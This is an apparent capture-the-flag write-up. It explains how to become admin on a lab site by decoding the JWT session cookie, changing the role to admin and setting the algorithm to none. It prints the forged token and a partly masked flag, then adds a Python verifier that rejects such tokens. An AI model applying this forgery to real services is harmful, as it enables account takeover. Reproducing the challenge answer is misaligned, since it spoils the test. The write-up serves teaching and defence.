Description

Most web application developers use third party components
without testing their security. Some of the past affected
companies are:

  • Equifax (a US credit bureau organization) - breach due to
    unpatched Apache Struts web framework CVE-2017-5638
  • Mossack Fonesca (Panama Papers law firm) breach -
    unpatched version of Drupal CMS used
  • VerticalScope (internet media company) - outdated
    version of vBulletin forum software used

Can you identify the components and exploit the
vulnerable one?
The website is running here. Can you become an admin?
You can login as test with the password Test123! to get
started.

Solution

To start, open the browser developer tools, go to Application, then Cookies, to see the cookies for the site. After logging in with the test credentials a new JWT (JSON Web Token) cookie appears:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdXRoIjoxNzA5NjE3NTUzMDg4LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjIuMC4wLjAgU2FmYXJpLzUzNy4zNiIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNzA5NjE3NTUzfQ.Wqcg2Ywm6ZPT7bcEGuBs01lhvU_I3VQ2HOG7772H-eU

The . is the separator, so it can be seen that there are three parts: first the header, then the payload, and lastly the signature. Each part is base64url-encoded, so it can be decoded with CyberChef.

Part 1:

Base64: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9

Decoded: {"typ":"JWT","alg":"HS256"}

Part 2:

Base64: eyJhdXRoIjoxNzA5NjE3NTUzMDg4LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjIuMC4wLjAgU2FmYXJpLzUzNy4zNiIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNzA5NjE3NTUzfQ

Decoded: {"auth":1709617553088,"agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36","role":"user","iat":1709617553}

Part 3:

Base64: Wqcg2Ywm6ZPT7bcEGuBs01lhvU_I3VQ2HOG7772H-eU

Decoded: (32 raw bytes, not printable text)

The last part is the HMAC-SHA256 signature (HS256) computed over the first two parts. It is raw binary rather than text, which is why it decodes to a weird value.

Take the second part's decoded version, change the role from user to admin, and encode it again with CyberChef to get a changed payload value. In the first part, alg is set to HS256, which is the algorithm that produces the third part. Setting it to none tells a server that honours the alg field from the token header to skip signature verification, so the third part can be left blank. So take the first part's decoded output, change HS256 to none, then re-encode it with base64.

Then put the parts back together to reconstruct the full JWT cookie with the admin role. Be careful to remove any "=" padding from the base64 output, because JWT segments use unpadded base64url (the URL-safe alphabet with - and _ rather than + and /).

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNzA5NjE3NTUzMDg4LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjIuMC4wLjAgU2FmYXJpLzUzNy4zNiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTcwOTYxNzU1M30.

When you change the cookie value to the modified cookie and refresh the page you get the flag.

Flag: picoCTF{succ3ss_@u7h3nt1c@710...4eacf}
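As an added example (not part of this writeup or of the challenge), the following standard-library Python verifier shows the server-side fix: the accepted algorithm is pinned by the server instead of being read from the token header, so the alg:none cookie built above is rejected, and a payload edited without re-signing fails the HMAC check. The signing key and the claims used to build the valid fixture are constructed for the demo, and the helper names are assumptions.

```python
import base64
import hashlib
import hmac
import json

DEMO_KEY = b"demo-signing-key-not-from-the-challenge"  # constructed; the challenge's real key is unknown and not needed
ALLOWED_ALGS = {"HS256"}  # the server pins the algorithm; the token header never chooses it

def b64url_decode(segment: str) -> bytes:
    # JWT segments are unpadded base64url; restore the padding before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def sign_hs256(claims: dict, key: bytes) -> str:
    # Only used to build a legitimately signed fixture for demo().
    header = b64url_encode(b'{"typ":"JWT","alg":"HS256"}')
    body = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"

def verify_jwt(token: str, key: bytes):
    """Return the claims if the HS256 signature is valid, otherwise None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        sig = b64url_decode(sig_b64)
    except ValueError:  # wrong segment count, bad base64 or bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") not in ALLOWED_ALGS:
        return None  # 'none' in any capitalisation, and any unexpected algorithm, stops here
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):  # constant-time comparison
        return None
    return json.loads(b64url_decode(payload_b64))

# The alg:none cookie from the writeup above (empty third segment).
FORGED = "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNzA5NjE3NTUzMDg4LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjIuMC4wLjAgU2FmYXJpLzUzNy4zNiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTcwOTYxNzU1M30."

def demo() -> dict:
    good = sign_hs256({"role": "user", "iat": 1709617553}, DEMO_KEY)
    header_b64, _, sig_b64 = good.split(".")
    edited = b64url_encode(b'{"role":"admin","iat":1709617553}')  # role changed, old signature kept
    return {
        "valid": verify_jwt(good, DEMO_KEY),
        "forged_none": verify_jwt(FORGED, DEMO_KEY),
        "edited_payload": verify_jwt(f"{header_b64}.{edited}.{sig_b64}", DEMO_KEY),
    }
```

Only the properly signed token yields claims; the alg:none cookie and the edited payload both come back as None.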